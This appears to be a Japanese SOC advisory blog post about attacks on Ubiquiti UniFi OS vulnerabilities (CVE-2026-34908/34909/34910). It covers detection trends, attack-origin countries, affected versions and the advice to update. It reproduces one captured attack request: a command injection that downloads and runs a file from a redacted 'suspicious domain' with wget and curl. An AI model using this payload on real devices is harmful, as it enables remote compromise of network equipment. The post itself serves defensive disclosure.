本サイトは、快適にご利用いただくためにクッキー(Cookie)を使用しております。
Cookieの使用に同意いただける場合は「同意する」ボタンを押してください。
なお本サイトのCookie使用については、「個人情報保護方針」をご覧ください。
Ubiquiti製UniFi OSの脆弱性(CVE-2026-34908/34909/34910)を狙った攻撃
今月は、Ubiquiti製のネットワーク機器に搭載されている「UniFi OS」の脆弱性を狙った攻撃を新たに観測しました。以下3つの脆弱性を狙った攻撃となっています。
| CVE番号 | 脆弱性概要 | CVSS v3.1値(脆弱性の深刻度) |
| CVE-2026-34908 | アクセス制御回避の脆弱性 | 10.0 |
| CVE-2026-34909 | パストラバーサルの脆弱性 | 10.0 |
| CVE-2026-34910 | コマンドインジェクションの脆弱性 | 10.0 |
いずれもCVSS値(脆弱性の深刻度)が高い脆弱性となっており、既にPoC(概念実証コード)が公開されているため、該当製品を使用されている場合は、早急に最新のバージョンにアップデートすることをお勧めします。
下図は、本脆弱性を狙った攻撃の検知数推移および攻撃元国です。弊社SOCでは6/9(火)から攻撃を観測しています。オランダからの攻撃が多数検知していました。
![]() |
| # | 2026年6月 | |
| 1 | オランダ | 90.2% |
| 2 | アメリカ | 6.4% |
| 3 | フランス | 1.4% |
| 4 | サウジアラビア | 0.9% |
| 5 | ドイツ | 0.7% |
以下は、弊社SOCで検知した攻撃例です。コマンドインジェクションにより不審ドメインから不正ファイルをダウンロードして実行することを試みた通信となっています。
| GET /proxy/users/api/v2/ucs/update/latest_package?pkg_name=x$(cd+/tmp+||+cd+/var/run+||+cd+/mnt+||+cd+/root+||+cd+/;+busybox+wget+http://不審ドメイン/zok+-O+zok;+curl+-o+zok+http://不審ドメイン/zok;+wget+http://不審ドメイン/zok;+chmod+777+zok;+./zok+unifi.exploit)&by_cmd=true HTTP/1.1 Host: xx.xx.xx.xx:443 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/148.0.0.0 Safari/537.36 X-Cnection: close |
影響対象
- UCG-Industrial 5.0.13 以前
- UDM 5.0.16 以前
- EFG 5.0.16 以前
- UDW 5.0.16 以前
- UDR 5.0.16 以前
- Express 7 5.0.16 以前
- UNVR 5.0.16 以前
- ENVR 5.0.16 以前
- UCG 5.0.16 以前
- UDR 5.0.17 以前
- ENVR 5.0.17 以前
- UCKP 5.0.17 以前
- UCK 5.0.17 以前
- UUniFi OS Server 5.0.6 以前
- UNVR-G2 5.1.11 以前
- UUDM-Beast 5.1.8 以前
- UUNAS 5.1.8 以前
- UExpress 4.0.13以前
対策方法
最新のバージョンにアップデートしてください。
参考情報
- Unfi - Security Advisory Bulletin 064
https://community.ui.com/releases/Security-Advisory-Bulletin-064-064/84811c09-4cf4-42ab-bd61-cc994445963b - CVE-2026-34908
https://www.cve.org/CVERecord?id=CVE-2026-34908
https://jvndb.jvn.jp/ja/contents/2026/JVNDB-2026-020869.html - CVE-2026-34909
https://www.cve.org/CVERecord?id=CVE-2026-34909
https://jvndb.jvn.jp/ja/contents/2026/JVNDB-2026-020868.html
マネージドサービス事業部
MBSD-SOC
MBSD-SOC
おすすめ記事
